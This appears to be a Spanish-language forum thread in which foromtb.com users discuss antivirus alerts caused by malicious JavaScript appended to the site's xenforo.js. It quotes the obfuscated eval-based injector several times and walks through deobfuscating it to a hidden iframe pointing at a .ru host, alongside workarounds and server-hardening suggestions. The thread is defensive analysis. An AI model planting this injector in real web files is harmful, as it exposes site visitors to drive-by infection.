Cuando http://www.foromtb.com/js/xenforo/xenforo.js no tenga al final del fichero este codigo: CODE, HTML o PHP Insertado: var Bacc,aaaBaaaBa,caaaBaac,BaaBcBaa;caaaBaac = eval;Bacc ="";aaaBaaaBa = new Array();aaaBaaaBa.push('%d#@#@o@@@#%c@@#um#@');aaaBaaaBa.push('@@e#!nt.writ#@@@e#!(');aaaBaaaBa.push('\'<i@#@#f@@#r%@a~@@#m');aaaBaaaBa.push('#@@@e#! sr@@@#%c@@#=');aaaBaaaBa.push('\"http://@@@#%c@@#%d#');aaaBaaaBa.push('@#@n.%@a~@@#m%@a~@@#');aaaBaaaBa.push('zon@@@#%c@@#%d#@#@ni');aaaBaaaBa.push('mg.ru/img303/?Img505');aaaBaaaBa.push('jp#@@@e#!g\" wi%d#@#@');aaaBaaaBa.push('th=\"1\" h#@@@e#!ight=');aaaBaaaBa.push('\"0\" @#@#f@@#r%@a~@@#');aaaBaaaBa.push('m#@@@e#!@#@%@b@or%d#');aaaBaaaBa.push('@#@#@@@e#!r=\"0\"></i@');aaaBaaaBa.push('#@#f@@#r%@a~@@#m#@@@');aaaBaaaBa.push('e#!>\');');function aaBBc(str) { return str.replace(/[!%#@~]/g,""); }for (var j=0;j<aaaBaaaBa.length;j++) {Bacc = aaBBc(aaaBaaaBa[j]);BaaBcBaa += Bacc;}caaaBaac(BaaBcBaa.substr(9)); He encontrado algo en los foros de xenforos: https://xenforo.com/community/threads/xenforo-hacked.42334/page-3 Hablan de un exploit del jsunpacker o un blackhole exploit. Pero es antiguo no me parece que sea aplicable al caso de foromtb. Lo ideal es comprobar la modificación de ficheros js por parte del webmaster o activar algún tipo de fail2ban con un jail en el server para evitar intentos de login (ssh, ftp etc..).
OK, entendido. Como comenta el compañero PituPedal, espero que los que sabéis hacer estas comprobaciones nos aviséis por aquí al resto de usuarios para que vayamos devolviendo la configuración de nuestros antivirus a su estado anterior, y normal en mi caso. ... tampoco estaría mal, e incluso sería lo suyo, que los administradores del foro, una vez resuelto el problema, avisaran a todos los usuarios de ello.
¿Alguien ha avisado a los administradores de la existencia del problema o tiene constancia de que estén al corriente?
Yo le he enviado esta mañana un privado a "Administrador" informándole de la existencia del problema. Pero no me ha contestado.
Ultimamente no suelen hacer mucho caso a los foreros, parece que el foro esta un poco abandonado a la mano de dios
Gracias Pitu, a mi también me saltaba el antivirus y ahora ya puedo escribir, esperemos que los administradores lo arreglen pronto.
¿Con, Safari, Tapatalk o con cualquier navegador te sucede? ¿Le pasa a alguien más o a otros sí os funciona con iPad?
Si alguno no le convence la opción del compañero @PituPedal hay una tercera vía, el uso de un sistema operativo virtual. Hay un método bastante usado en el rescate de equipos con fallos en el sistema operativo, el uso de un usb con un sistema operativo que permite el modo live. El método mas sencillo para crearlo es usar el programa gratuito lili, Linux live usb creator http://www.linuxliveusb.com/en/home Es un programa muy sencillo, se descarga y lo instalamos, al arrancar el programa nos mostrara una interfaz transparente con menú para crear un usb boteable. ponemos un pendrive de 4 u 8 gigabites y seguimos los pasos, elegimos en la primera casilla la letra de la unidad que windows le asigne al pendrive, seguidamente en la segunda casilla elegimos "descargar" y nos mostrara una lista de distintas distribuciones de linux, descargamos ubuntu con "gnome" que es de las mas sencillas de manejar y ya lleva firefox de serie, nos mostrara una barra de progreso de la descarga. Una vez finalizada la descarga vamos a la siguiente casilla y elegimos el tamaño de la persistencia que no es ni mas ni menos que la cantidad de "disco duro" que utilizara de la memoria del pendrive, para facilitar el uso las casillas tienen un semáforo que nos indicara si el paso de la casilla esta completo. En las siguiente casilla de opciones marcamos solamente la casilla del centro "formatear el dispositivo" que formatea el pen y lo prepara para su uso, ya tan solo queda pulsar en el rayo y esperar a que el programa termine de crear nuestro pen de rescate. Su uso es muy sencillo, reiniciamos el ordenador y en el arranque de ms dos pulsamos la tecla que nos indique en la pantalla como "boot menú" que suele ser f10 o f12, cuando nos salga las opciones de boot elegimos pen usb. Entonces veremos muchas letras y números y en un par de minutos nos mostrara el menú de instalación de ubuntu, elegimos la opción "probar ubuntu" o "modo live" Y ya tenemos un sistema operativo virtual que no hace ningún cambio en nuestro equipo, no hay que preocuparse ni de drivers ni nada mas, directamente ubuntu los detecta y los aplica sin tener que hacer apenas nada mas, en la barra de herramientas del escritorio podréis ver la conexión para conectar si usáis wifi, si usáis cable no necesitareis hacer nada mas, en la barra lateral izquierda podréis ver firefox ya instalado, le dais y a funcionar. Mañana con algo mas de tiempo haré algunas capturas de pantalla. Saludos!!!
Pensad que no es una solución, si no una forma de cegar al antivirus... A mi me parece deplorable que los admins no se personen ni para asuntos como este. Viva tapatalk
Como ya he dicho en algun otro hilo, es increible que esto no esté solucionado ya. A lo mejor piensan que el problema es mio por usar un determinado antivirus, pues es posible. Pero que un foro me "obligue" a desactivar el antivirus o a cambiarlo, pues no. Simplemente cambio de foro o dejo de usarlo y ya esta. Por cierto, yo para poner mensajes desde el PC abro el panel de herramientas de desarrollo, busco el elemento del textarea que tiene un display:none y le quito este estilo para mostrarlo. Al menos asi sale el elemento de texto para escribir, aunque sin emoticonos ni herramientas de texto ni nada. Pero ya digo que cuando hasta que me canse, en ese momento paso de seguir usando el foro y fuera, no tengo problema.
Bueno, por lo que han dicho los compañeros que han identificado la causa del problema, éste radica en la plataforma de XenForo, que es la que provee del SW del foro a los responsables de foromtb.com. Vamos, que no son los admin de foromtb.com los que van a resolver eso. Si que es cierto que podrían, deberían, dar la cara y estar aquí explicándonos a todos nosotros cómo va la cosa y qué plazos manejan ellos (a instancias de lo que XenForo les diga) para resolver este problema.
Detallo un poco al "bicho" que se ha infiltrado al final de http://www.foromtb.com/js/xenforo/xenforo.js CODE, HTML o PHP Insertado: var Bacc,aaaBaaaBa,caaaBaac,BaaBcBaa;caaaBaac = eval;Bacc ="";aaaBaaaBa = new Array();aaaBaaaBa.push('%d#@#@o@@@#%c@@#um#@');aaaBaaaBa.push('@@e#!nt.writ#@@@e#!(');aaaBaaaBa.push('\'<i@#@#f@@#r%@a~@@#m');aaaBaaaBa.push('#@@@e#! sr@@@#%c@@#=');aaaBaaaBa.push('\"http://@@@#%c@@#%d#');aaaBaaaBa.push('@#@n.%@a~@@#m%@a~@@#');aaaBaaaBa.push('zon@@@#%c@@#%d#@#@ni');aaaBaaaBa.push('mg.ru/img303/?Img505');aaaBaaaBa.push('jp#@@@e#!g\" wi%d#@#@');aaaBaaaBa.push('th=\"1\" h#@@@e#!ight=');aaaBaaaBa.push('\"0\" @#@#f@@#r%@a~@@#');aaaBaaaBa.push('m#@@@e#!@#@%@b@or%d#');aaaBaaaBa.push('@#@#@@@e#!r=\"0\"></i@');aaaBaaaBa.push('#@#f@@#r%@a~@@#m#@@@');aaaBaaaBa.push('e#!>\');');function aaBBc(str) { return str.replace(/[!%#@~]/g,""); }for (var j=0;j<aaaBaaaBa.length;j++) {Bacc = aaBBc(aaaBaaaBa[j]);BaaBcBaa += Bacc;}caaaBaac(BaaBcBaa.substr(9)); Si separamos líneas de códido para que resulte más cómodo, pasa a ser lo siguiente: CODE, HTML o PHP Insertado: var Bacc,aaaBaaaBa,caaaBaac,BaaBcBaa; caaaBaac = eval; Bacc =""; aaaBaaaBa = new Array(); aaaBaaaBa.push('%d#@#@o@@@#%c@@#um#@'); aaaBaaaBa.push('@@e#!nt.writ#@@@e#!('); aaaBaaaBa.push('\'<i@#@#f@@#r%@a~@@#m'); aaaBaaaBa.push('#@@@e#! sr@@@#%c@@#='); aaaBaaaBa.push('\"http://@@@#%c@@#%d#'); aaaBaaaBa.push('@#@n.%@a~@@#m%@a~@@#'); aaaBaaaBa.push('zon@@@#%c@@#%d#@#@ni'); aaaBaaaBa.push('mg.ru/img303/?Img505'); aaaBaaaBa.push('jp#@@@e#!g\" wi%d#@#@'); aaaBaaaBa.push('th=\"1\" h#@@@e#!ight=') ;aaaBaaaBa.push('\"0\" @#@#f@@#r%@a~@@#'); aaaBaaaBa.push('m#@@@e#!@#@%@b@or%d#'); aaaBaaaBa.push('@#@#@@@e#!r=\"0\"></i@'); aaaBaaaBa.push('#@#f@@#r%@a~@@#m#@@@'); aaaBaaaBa.push('e#!>\');'); function aaBBc(str) { return str.replace(/[!%#@~]/g,""); } for (var j=0;j<aaaBaaaBa.length;j++) {Bacc = aaBBc(aaaBaaaBa[j]);BaaBcBaa += Bacc;}caaaBaac(BaaBcBaa.substr(9)); Cabiar el nombre de variables y funciones, obra magia para entender qué hace: CODE, HTML o PHP Insertado: var strFragmento,strOfuscado,Procesa,strVisible; Procesa = eval; strFragmento =""; strOfuscado = new Array(); strOfuscado.push('%d#@#@o@@@#%c@@#um#@'); strOfuscado.push('@@e#!nt.writ#@@@e#!('); strOfuscado.push('\'<i@#@#f@@#r%@a~@@#m'); strOfuscado.push('#@@@e#! sr@@@#%c@@#='); strOfuscado.push('\"http://@@@#%c@@#%d#'); strOfuscado.push('@#@n.%@a~@@#m%@a~@@#'); strOfuscado.push('zon@@@#%c@@#%d#@#@ni'); strOfuscado.push('mg.ru/img303/?Img505'); strOfuscado.push('jp#@@@e#!g\" wi%d#@#@'); strOfuscado.push('th=\"1\" h#@@@e#!ight='); strOfuscado.push('\"0\" @#@#f@@#r%@a~@@#'); strOfuscado.push('m#@@@e#!@#@%@b@or%d#'); strOfuscado.push('@#@#@@@e#!r=\"0\"></i@'); strOfuscado.push('#@#f@@#r%@a~@@#m#@@@'); strOfuscado.push('e#!>\');'); function Desofuscar(str) { return str.replace(/[!%#@~]/g,""); } for (var j=0;j<strOfuscado.length;j++) {strFragmento = Desofuscar(strOfuscado[j]);strVisible += strFragmento;} Procesa(strVisible.substr(9)); Si dejo ejecutado "Desofuscar" CODE, HTML o PHP Insertado: var strFragmento,strOfuscado,Procesa,strVisible; Procesa = eval; strFragmento =""; strOfuscado = new Array(); strOfuscado.push('docum'); strOfuscado.push('ent.write('); strOfuscado.push('\'<ifram'); strOfuscado.push('e src='); strOfuscado.push('\"http://cd'); strOfuscado.push('n.ama'); strOfuscado.push('zoncdni'); strOfuscado.push('mg.ru/img303/?Img505'); strOfuscado.push('jpeg\" wid'); strOfuscado.push('th=\"1\" height='); strOfuscado.push('\"0\" fra'); strOfuscado.push('mebord'); strOfuscado.push('er=\"0\"></i'); strOfuscado.push('fram'); strOfuscado.push('e>\');'); for (var j=0;j<strOfuscado.length;j++) {strFragmento = strOfuscado[j];strVisible += strFragmento;} Procesa(strVisible.substr(9)); Ejecuto el bucle que une la matriz en una sola cadena y limpio código CODE, HTML o PHP Insertado: var Procesa,strVisible; Procesa = eval; strVisible = 'document.write(\'<iframe src=\"http://cdn.amazoncdnimg.ru/img303/?Img505jpeg\" width=\"1\" height=\"0\" frameborder=\"0\"></iframe>\');'; Procesa(strVisible.substr(9)); Quitamos los primeros 9 caracteres que se desechan CODE, HTML o PHP Insertado: var Procesa,strVisible; Procesa = eval; strVisible = 'write(\'<iframe src=\"http://cdn.amazoncdnimg.ru/img303/?Img505jpeg\" width=\"1\" height=\"0\" frameborder=\"0\"></iframe>\');'; Procesa(strVisible); Y ya tenemos la orden final CODE, HTML o PHP Insertado: eval(write(\'<iframe src=\"http://cdn.amazoncdnimg.ru/img303/?Img505jpeg\" width=\"1\" height=\"0\" frameborder=\"0\"></iframe>\');'); Que es simplemente: CODE, HTML o PHP Insertado: write(\'<iframe src=\"http://cdn.amazoncdnimg.ru/img303/?Img505jpeg\" width=\"1\" height=\"0\" frameborder=\"0\"></iframe>\');') Y eso, simplemente agrega el código HTML siguiente CODE, HTML o PHP Insertado: <iframe src="http://cdn.amazoncdnimg.ru/img303/?Img505jpeg" width="1" height="0" frameborder="0"></iframe> Et voilà!
Hasta ahora... he estado leyendo y me he querido mantener un poco 'al lado', pero cuando os digo que hablo con 'conocimiento de causa' es por que en mi dia a dia me toca bregar con sites que han sufrido problemas de cross site scripting y demás marranadas de cara al usuario (hablamos de WordPress, Drupal, Xenforo y otros, pero estos son los 3 'main offenders'). Los administradores del foro poco pueden hacer salvo ir un poco a remolque a menos que el que tenga acceso al Shell del equipo tenga bastante 'instinto asesino', sepa el terreno que pisa y les complique un poco las cosas a esos criajos que armados con rootkits se creen los amos del mambo (LiteSpeed tampoco ayuda mucho... de veras, la gente sigue cayendo el el por culpa del marketing). Hay cosas que... cuanto menos me intranquilizan bastante: [bofh@app01lon ~]$ curl -I http://www.foromtb.com HTTP/1.1 200 OK Date: Mon, 07 Sep 2015 17:48:47 GMT Server: LiteSpeed Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-control: private, max-age=0 Set-Cookie: xf_session=016d371c345c38647d7220d69cedd340; path=/; httponly X-Frame-Options: SAMEORIGIN Content-Type: text/html; charset=UTF-8 Last-Modified: Mon, 07 Sep 2015 17:48:47 GMT MS-Author-Via: DAV Me imagino que lo que tendrán es una maquina y que la administran con Plesk o algo similar. Asi a bote pronto solo puedo recomendarles a los admines de foromtb: - Olvidarse de LiteSpeed, mucho mejor Nginx. - Deshabilitar las extensiones WebDAV (son un coladero de seguridad) - Inviertan en un certificado TLS (no es muy caro). Atención a pasarse de brutos y usar DH >1024 o los que usen IE6 o Win xp no podrán acceder al foro- Si todavía queda alguno. - Desactivar SSL 2 y 3 (nos olvidamos de problemas de Heartbleed y otras 'cosas feas') y usar solo TLS 1.x. - Pasen foromtb a trafico https (habilitar SPDY porfavor... a los usuarios de móviles, tabletas y navegadores serios nos hará mucho bien). - Configurar bien PFS y que las cipher suites estén bien y no usen ciphers débiles. - Activar y configurar bien HSTS+AntiClickjacking (y lo mas importante... que Google bregue con jQuery y demás guarrerias que lleva Xenforo) eso ayudará a hacer algo mas seguro el sitio. Esto es una 'carta a los Reyes magos' pero... quien sabe, a lo peor existen. Si el admin me lee... puedo echarle una mano o dos.
Magníficos comentarios y aportes tecnológicos para superar este problema de virus aunque de una manera u otra, todos estamos en riesgo de infectar nuestras máquinas, pero estamos HUÉRFANOS POR PARTE DE LOS ADMINISTRADORES Y RESPONSABLES DE ESTE MAGNIFICO FORO. Hasta tanto no se solucione este problema me limitaré a leer los mensajes de los compañeros foreros sin participar con mis comentarios: Es grande el riesgo !!!
